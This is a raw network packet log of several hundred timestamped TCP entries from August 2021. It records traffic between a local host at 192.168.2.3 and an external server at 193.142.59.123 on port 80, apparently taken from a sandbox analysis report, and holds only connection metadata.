Aug 23, 2021 02:08:39.560316086 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560338974 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560338974 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560363054 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560385942 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560396910 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560410023 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560434103 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560456038 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560477018 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560483932 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560492992 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560496092 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560522079 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560528040 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560545921 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560566902 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560575008 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560590982 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560614109 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560635090 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560636997 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560659885 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560672998 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560683012 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560709953 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560713053 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560731888 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560754061 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560759068 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560777903 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560801029 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560810089 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560823917 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560848951 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560849905 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560872078 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560898066 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560899019 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560923100 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560944080 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560945988 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560966969 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560990095 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.592113018 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.592164993 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.592173100 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.592216969 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.592252970 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.592272997 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.592287064 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.592322111 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.592343092 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.592355013 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.592391014 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.592396021 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.592427015 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.592461109 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.592478991 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.592493057 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.592525959 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.592531919 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.592560053 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.592592001 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.592598915 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.592629910 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.592662096 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.592681885 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.592695951 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.592727900 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.592747927 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.592763901 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.592799902 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.592818022 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.592833042 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.592865944 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.592883110 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.592899084 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.592921019 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.592943907 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.592946053 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.592967033 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.592988968 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.592991114 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593014002 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593034983 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593044043 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.593060017 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593080044 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.593081951 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593103886 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593127012 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593127012 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.593168020 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.593373060 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593394995 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593414068 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593434095 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593452930 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593470097 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593487024 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593506098 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593524933 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593540907 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593559027 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593575954 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593594074 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593610048 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593626976 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593642950 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593661070 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593677044 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593693972 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593710899 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593729019 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593746901 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593763113 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593779087 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593795061 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593811989 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593827963 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593843937 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593861103 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593877077 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593894005 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593910933 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593928099 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593944073 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593961000 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593978882 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.593996048 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594012022 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594028950 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594044924 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594062090 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594078064 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594096899 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594114065 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594130993 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594147921 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594163895 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594181061 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594197989 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594214916 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594232082 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594249010 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594264984 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594281912 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594299078 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594316006 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594332933 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594348907 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594366074 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594382048 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594398975 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594414949 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594432116 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594449043 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594465017 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594480991 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594497919 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594513893 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594531059 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594547033 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594563007 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594580889 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594598055 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594614029 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594630957 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594647884 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594665051 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594681025 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594696999 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594713926 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594731092 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594746113 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594762087 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594779015 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594794989 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594813108 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594830036 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594846964 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594865084 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594881058 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594897985 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594916105 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594933033 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594949007 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594964981 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594980955 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.594997883 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.595014095 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.595031023 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.595647097 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.595706940 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.624279976 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624361992 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624381065 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624398947 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624419928 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624442101 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624463081 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624484062 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624496937 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.624520063 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.624522924 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.624526024 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624562025 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624583960 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624588966 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.624605894 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624627113 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624631882 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.624650002 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624670982 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624687910 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624703884 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624716043 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.624752998 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624754906 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.624768972 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.624775887 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624797106 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624814987 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.624816895 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624838114 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624860048 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624865055 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.624882936 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624907017 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624907970 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.624931097 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624952078 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.624952078 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624970913 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.624991894 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.625006914 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.625029087 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.625047922 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.625066042 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.625089884 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.625124931 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.625127077 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.625149012 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.625171900 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.625183105 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.625237942 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.626751900 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.626780987 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.626802921 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.626827002 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.626833916 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.626873016 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.626972914 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.626997948 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627032042 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.627046108 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627068043 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627094984 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627129078 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627130032 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.627152920 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627173901 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627175093 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.627193928 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627216101 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627217054 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.627238035 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627260923 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627274036 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.627290010 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627311945 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627314091 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.627346039 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627361059 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.627370119 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627396107 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627418041 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627434969 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.627439976 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627465010 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627482891 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.627487898 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627511024 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627530098 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.627535105 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627558947 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627564907 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.627583027 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627607107 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627629995 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627645016 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.627654076 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627676010 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627697945 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627712011 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.627721071 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627743959 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627764940 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627773046 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.627789974 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627803087 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.627815008 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627851963 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.627880096 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627901077 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.627939939 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.656167030 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.656189919 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.656203985 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.656234980 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.656286955 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.729921103 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.764095068 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.764156103 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.764179945 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.764203072 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.764218092 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.764240026 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.764265060 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.764275074 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.764296055 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.764329910 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.764344931 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.764367104 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.764385939 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.764400959 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.764422894 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.764448881 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.764457941 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.764481068 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.764497995 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.764570951 CEST	80	49735	193.142.59.123	192.168.2.3
